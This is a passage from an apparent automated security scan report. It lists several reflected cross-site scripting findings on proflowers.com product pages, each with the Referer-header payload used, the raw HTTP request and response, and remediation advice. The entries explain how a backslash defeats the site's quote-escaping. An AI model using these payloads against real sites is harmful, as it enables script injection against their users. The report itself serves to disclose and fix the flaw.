Set-Cookie: PRVD=SiteSplitID=82; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:57:02 GMT; path=/
Set-Cookie: PFC_BrowserId=8564deb7-1945-4637-ab89-04d31d64079e; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30007596&12/16/2010 11:57:04 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:57:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:04 GMT
Connection: close
Content-Length: 156363


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30007596","30007596","30007596","280796","82","organicgglgeneric_be988\\";alert(1)//631d415fd3","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-1,cnd-32,pvo-2,pbr-4,pcy-8,psk-2,poe-1,zzc-1,pjs-3,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-1,nte-1,ntc-1,peo-1,pfp-2,phr-2,pjt-1,psv-4,
...[SNIP]...

2.123. http://products.proflowers.com/Sugar-Plum-Lilies-with-Pine-30034223 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /Sugar-Plum-Lilies-with-Pine-30034223

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cebf\"%3balert(1)//0073b4d8f31 was submitted in the Referer HTTP header. This input was echoed as 8cebf\\";alert(1)//0073b4d8f31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Sugar-Plum-Lilies-with-Pine-30034223 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8cebf\"%3balert(1)//0073b4d8f31

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=f410mhfqnzwlslxbake2spfm; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=f410mhfqnzwlslxbake2spfm; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-2,cnd-32,pvo-1,pbr-3,psk-1,pps-2,poe-2,zzc-1,pjs-3,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-2,peo-1,pfp-2,phr-1,zza-2,psv-3,nta-2,ntb-1,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-5,zzb-2,gfr-2,apg-2,ppe-2,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:57:01 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:57:01 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=30; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:57:01 GMT; path=/
Set-Cookie: PFC_BrowserId=2f34e179-2189-42cc-afd4-b7224823a01e; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30034223&12/16/2010 11:57:03 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:57:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:03 GMT
Connection: close
Content-Length: 151361


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30034223","30034223","30034223","370359","30","organicgglgeneric_8cebf\\";alert(1)//0073b4d8f31","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-32,pvo-1,pbr-3,pcy-5,psk-1,poe-2,zzc-1,pjs-3,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-2,peo-1,pfp-2,phr-1,pjt-2,psv-3,
...[SNIP]...

2.124. http://products.proflowers.com/birthday/Birthday-Bear-4878 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /birthday/Birthday-Bear-4878

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 982ec\"%3balert(1)//c92c3f25076 was submitted in the Referer HTTP header. This input was echoed as 982ec\\";alert(1)//c92c3f25076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /birthday/Birthday-Bear-4878 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=982ec\"%3balert(1)//c92c3f25076

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=cpmo02vqftarr42ikl2hdwd5; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=cpmo02vqftarr42ikl2hdwd5; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-2,cnd-31,pvo-1,pbr-3,psk-1,pps-2,poe-2,zzc-2,pjs-1,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-1,peo-1,pfp-2,phr-1,zza-2,psv-4,nta-1,ntb-1,pmo-1,ppr-2,spg-2,xpc-1,psr-1,pcy-5,zzb-2,gfr-1,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:57:31 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:57:31 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=94; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:57:31 GMT; path=/
Set-Cookie: PFC_BrowserId=81b88de2-4d47-405b-a688-289c7f2cb735; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=4878&12/16/2010 11:57:34 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:57:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:35 GMT
Connection: close
Content-Length: 138250


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
alendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("4878","4878","4878","288556","94","organicgglgeneric_982ec\\";alert(1)//c92c3f25076","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-1,cnd-31,pvo-1,pbr-3,pcy-5,psk-1,poe-2,zzc-2,pjs-1,pcu-1,spg-2,mpsmediapersonalitysplit-1,ntd-2,nte-2,ntc-1,peo-1,pfp-2,phr-1,pjt-2,psv-4,
...[SNIP]...

2.125. http://products.proflowers.com/chocolate/12-HandDipped-Fancy-Berries-9722 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /chocolate/12-HandDipped-Fancy-Berries-9722

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3048\"%3balert(1)//8c22361f3cc was submitted in the Referer HTTP header. This input was echoed as e3048\\";alert(1)//8c22361f3cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /chocolate/12-HandDipped-Fancy-Berries-9722 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e3048\"%3balert(1)//8c22361f3cc

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=3oss51kpe5m2pi4dsxjstlt1; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=3oss51kpe5m2pi4dsxjstlt1; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pjt-1,cnd-31,pvo-2,pbr-4,psk-2,pps-1,poe-1,zzc-2,pjs-2,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-1,peo-1,pfp-1,phr-1,zza-2,psv-3,nta-1,ntb-2,pmo-1,ppr-2,spg-1,xpc-1,psr-1,pcy-5,zzb-2,gfr-1,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:57:04 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:57:04 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=124; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:57:04 GMT; path=/
Set-Cookie: PFC_BrowserId=719e8fba-6cc3-4600-b706-1643abba5d1c; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=9722&12/16/2010 11:57:08 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:57:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:09 GMT
Connection: close
Content-Length: 146344


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
oadCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("9722","9722","9722","0","124","organicgglgeneric_e3048\\";alert(1)//8c22361f3cc","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-2,pso-1,pfl-2,cnd-31,pvo-2,pbr-4,pcy-5,psk-2,poe-1,zzc-2,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-2,nte-1,ntc-1,peo-1,pfp-1,phr-1,pjt-1,psv-3,
...[SNIP]...

2.126. http://products.proflowers.com/chocolate/Handmade-Chocolate-Covered-Snowman-Hats-30010311 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /chocolate/Handmade-Chocolate-Covered-Snowman-Hats-30010311

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45fed\"%3balert(1)//05d044b97fa was submitted in the Referer HTTP header. This input was echoed as 45fed\\";alert(1)//05d044b97fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /chocolate/Handmade-Chocolate-Covered-Snowman-Hats-30010311 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=45fed\"%3balert(1)//05d044b97fa

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=ss1ychd1gj5j3tsi5jpqo4gt; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=ss1ychd1gj5j3tsi5jpqo4gt; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pjt-1,cnd-31,pvo-1,pbr-3,psk-2,pps-2,poe-2,zzc-2,pjs-3,pcu-1,pfl-2,mpsmediapersonalitysplit-1,ntd-1,nte-2,ntc-2,peo-1,pfp-1,phr-1,zza-1,psv-4,nta-1,ntb-1,pmo-1,ppr-1,spg-1,xpc-1,psr-1,pcy-8,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:56:36 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:56:36 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=33; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:56:36 GMT; path=/
Set-Cookie: PFC_BrowserId=ad0c0231-b499-4861-8f34-b69d9a0dec12; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30010311&12/16/2010 11:56:37 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:56:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:56:37 GMT
Connection: close
Content-Length: 132750


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
OnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30010311","30010311","30010311","0","33","organicgglgeneric_45fed\\";alert(1)//05d044b97fa","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-2,pso-1,pfl-2,cnd-31,pvo-1,pbr-3,pcy-8,psk-2,poe-2,zzc-2,pjs-3,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-1,nte-2,ntc-2,peo-1,pfp-1,phr-1,pjt-1,psv-4,
...[SNIP]...

2.127. http://products.proflowers.com/flowers/15-Christmas-Tulips-with-Fresh-Douglas-Fir-30007158 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/15-Christmas-Tulips-with-Fresh-Douglas-Fir-30007158

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa84\"%3balert(1)//0d9f8a643fd was submitted in the Referer HTTP header. This input was echoed as efa84\\";alert(1)//0d9f8a643fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/15-Christmas-Tulips-with-Fresh-Douglas-Fir-30007158 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=efa84\"%3balert(1)//0d9f8a643fd

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=xcamnszjqkqsc0dsuz3m0oiv; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=xcamnszjqkqsc0dsuz3m0oiv; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pjt-2,cnd-34,pvo-1,pbr-4,psk-2,pps-2,poe-1,zzc-1,pjs-2,pcu-1,pfl-1,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-1,peo-1,pfp-2,phr-2,zza-1,psv-3,nta-2,ntb-1,pmo-1,ppr-2,spg-1,xpc-1,psr-2,pcy-8,zzb-1,gfr-2,apg-1,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:25 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:25 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=80; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:25 GMT; path=/
Set-Cookie: PFC_BrowserId=a9b136dd-51c7-4f9c-9e2f-d2100811926c; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30007158&12/16/2010 11:54:26 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:26 GMT
Connection: close
Content-Length: 195703


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30007158","30007158","30007158","258050","80","organicgglgeneric_efa84\\";alert(1)//0d9f8a643fd","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-1,phl-1,pso-1,pfl-1,cnd-34,pvo-1,pbr-4,pcy-8,psk-2,poe-1,zzc-1,pjs-2,pcu-1,spg-1,mpsmediapersonalitysplit-1,ntd-1,nte-3,ntc-1,peo-1,pfp-2,phr-2,pjt-2,psv-3,
...[SNIP]...

2.128. http://products.proflowers.com/flowers/18-Christmas-Lights-Roses-wChocolate-Covered-Oreos-30046055 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Christmas-Lights-Roses-wChocolate-Covered-Oreos-30046055

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcbc7\"%3balert(1)//0bae500da8e was submitted in the Referer HTTP header. This input was echoed as fcbc7\\";alert(1)//0bae500da8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /flowers/18-Christmas-Lights-Roses-wChocolate-Covered-Oreos-30046055 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fcbc7\"%3balert(1)//0bae500da8e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wparwg0h4b5dw1atvokohcad; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=wparwg0h4b5dw1atvokohcad; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pjt-2,cnd-32,pvo-2,pbr-4,psk-2,pps-1,poe-1,zzc-1,pjs-3,pcu-1,pfl-2,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-2,peo-1,pfp-2,phr-2,zza-1,psv-3,nta-2,ntb-2,pmo-1,ppr-1,spg-1,xpc-1,psr-2,pcy-8,zzb-2,gfr-2,apg-2,ppe-1,pcb-1; domain=.proflowers.com; expires=Mon, 16-Jan-2012 19:54:06 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=12/16/2010 11:54:06 AM; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=81; domain=.proflowers.com; expires=Sun, 19-Dec-2010 19:54:06 GMT; path=/
Set-Cookie: PFC_BrowserId=33d22fc7-0448-48a4-be1d-bc4205d141f7; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30046055&12/16/2010 11:54:08 AM; domain=.proflowers.com; expires=Wed, 16-Mar-2011 18:54:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:54:09 GMT
Connection: close
Content-Length: 159958


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30046055","30046055","30046055","402580","81","organicgglgeneric_fcbc7\\";alert(1)//0bae500da8e","","PFC","1",0,"",1,"xpa-1,xpb-1,pballoons-2,phl-1,pso-1,pfl-2,cnd-32,pvo-2,pbr-4,pcy-8,psk-2,poe-1,zzc-1,pjs-3,pcu-1,spg-1,mpsmediapersonalitysplit-2,ntd-1,nte-1,ntc-2,peo-1,pfp-2,phr-2,pjt-2,psv-3,
...[SNIP]...

2.129. http://products.proflowers.com/flowers/20-Christmas-Tulips-wFREE-Candy-Cane-Vase--Chocolates-30001707 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Christmas-Tulips-wFREE-Candy-Cane-Vase--Chocolates-30001707

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcfda\"%3balert(1)//38795a5ce05 was submitted in the Referer HTTP header. This input was echoed as fcfda\\";alert(1)//38795a5ce05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

